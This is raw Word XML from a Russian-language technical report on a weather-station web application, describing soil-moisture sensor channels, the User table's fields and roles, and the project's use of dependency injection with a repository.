          <w:p w14:paraId="3C744F45" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>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5511D5F8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>процент влажности почвы записанный первым каналом на глубине 100 см</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="77ADB62F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4911D65E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>channel</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C59A96B"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26C53C79" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>процент влажности почвы записанный вторым каналом на глубине 50 см</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="18B83693" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E332D2C"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C58D3D0"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26C2C2CF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>процент влажности почвы записанный третьим каналом на глубине 30 см</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="27E7E7FF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E1261CB"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="523E9205"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4574AB99" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>процент влажности почвы записанный четвертым каналом на глубине 20 см</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="310E8BB2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06BBEC32"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7260E35F"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09FFAFF9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>процент влажности почвы записанный пятым каналом на глубине 10 см</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1611F3E6" w14:textId="47843D8B" w:rsidR="0093378B" w:rsidRPr="003E3F21" w:rsidRDefault="0093378B" w:rsidP="003E3F21">
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="009C56D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">содержит данные о пользователях системы. В системе предусмотрено </w:t>
      </w:r>
      <w:r w:rsidRPr="009C56D5">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> типа пользователей: администратор</w:t>
      </w:r>
      <w:r w:rsidRPr="009C56D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и пользователь. Авторизованный пользователь на сайте может скачать наблюдения за указанный период в формате </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Excel</w:t>
      </w:r>
      <w:r w:rsidRPr="003B38D3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000436C1" w:rsidRPr="000436C1">
        <w:t xml:space="preserve">В текущей </w:t>
      </w:r>
      <w:r w:rsidR="00D7766A">
        <w:t>версии а</w:t>
      </w:r>
      <w:r w:rsidRPr="000436C1">
        <w:t xml:space="preserve">дминистратор </w:t>
      </w:r>
      <w:r w:rsidR="00CC7695" w:rsidRPr="000436C1">
        <w:t xml:space="preserve">не </w:t>
      </w:r>
      <w:r w:rsidRPr="000436C1">
        <w:t xml:space="preserve">обладает </w:t>
      </w:r>
      <w:r w:rsidR="00CC7695" w:rsidRPr="000436C1">
        <w:t>отличительными</w:t>
      </w:r>
      <w:r w:rsidRPr="000436C1">
        <w:t xml:space="preserve"> возможностями</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B38D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Пароль хранится в зашифрованном виде, алгоритм шифрования – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sha</w:t>
      </w:r>
      <w:r w:rsidRPr="003B38D3">
        <w:t xml:space="preserve">256. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Также следует уточнить, что поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r w:rsidRPr="003B38D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в таблице может принимать только два числовых значения – 0 для пользователя, 1 для администратора.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3F21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Описание данных приведено в таблице 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C675ED" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00EC10A8" w:rsidRDefault="0093378B" w:rsidP="003E3F21">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 1 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства таблицы «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>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91"/>
        <w:gridCol w:w="1799"/>
        <w:gridCol w:w="4947"/>
      </w:tblGrid>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="10E45E6C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5DA6E7DA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Название колонки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67197F78" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Тип данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5352" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="583C004D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="53B5E8F1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2406FD8C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3B39B30F"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2F972011" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>уникальный идентификатор записи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="4B1468CB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04B64B4F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6073BC6F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5352" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5310EB01" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>пароль учётной записи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="4F2FA362" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69050F02" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="021DA2B6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5352" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45F7D192" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>имя пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="5E399880" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="719BD32C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02012065"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00447B44" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>роль пользователя, где 0 – это пользователь, а 1 - администратор</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0998D170" w14:textId="77777777" w:rsidR="004A1170" w:rsidRDefault="004A1170" w:rsidP="003E3F21"/>
    <w:p w14:paraId="629C4B32" w14:textId="18B8EE40" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="003E3F21">
      <w:r>
        <w:t>Свойства таблицы «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3F21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>из базы данных идентичны с полями класса «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90EA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>из пространства имён контроллера. Суть взаимодействия двух конечных точек – базы данных и пользовательского интерфейса реализована с помощью архитектурного принципа «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90EA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90EA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>или же «Внедрение зависимостей». Данный подход не является обязательным в программировании, но благодаря ему можно писать легко</w:t>
      </w:r>
      <w:r w:rsidR="00D7766A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">поддерживаемые и расширяемые приложения. Основная идея внедрения зависимостей – это внедрение интерфейса между взаимодействием класса модели и контроллера обработки данных. Например, чтобы реализовать отображение данных метеостанции в графическом интерфейсе сначала необходимо создать объект «репозиторий» и строку подключения к базе данных, чтобы передавать из базы в репозиторий сами данные. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FDB1E8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="003E3F21">
      <w:r>
        <w:t xml:space="preserve">Строка подключений содержится в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>appsettings.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009473D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
